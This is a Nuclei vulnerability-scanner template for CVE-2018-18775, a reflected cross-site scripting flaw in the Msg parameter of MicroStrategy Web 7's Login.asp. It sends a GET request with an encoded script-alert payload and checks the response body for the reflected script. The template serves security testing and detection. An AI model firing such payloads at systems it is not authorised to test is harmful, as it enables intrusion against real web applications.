nuclei-templates/cves/2018/CVE-2018-18775.yaml

38 lines
1.2 KiB
YAML

id: CVE-2018-18775
info:
name: Cross Site Scripting in Microstrategy Web version 7
author: 0x_Akoko
severity: medium
description: Microstrategy Web, version 7, does not sufficiently encode user-controlled inputs, resulting in a Cross-Site Scripting (XSS) vulnerability via the Login.asp Msg parameter
reference:
- https://www.exploit-db.com/exploits/45755
- http://packetstormsecurity.com/files/150059/Microstrategy-Web-7-Cross-Site-Scripting-Traversal.html
- https://www.exploit-db.com/exploits/45755/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-18775
cwe-id: CWE-79
tags: cve,cve2018,microstrategy,xss
requests:
- method: GET
path:
- '{{BaseURL}}/microstrategy7/Login.asp?Server=Server001&Project=Project001&Port=0&Uid=Uid001&Msg=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3B%3C%2Fscript%3E%3C'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- '"><script>alert(/{{randstr}}/);</script>'
part: body
- type: word
words:
- "text/html"
part: header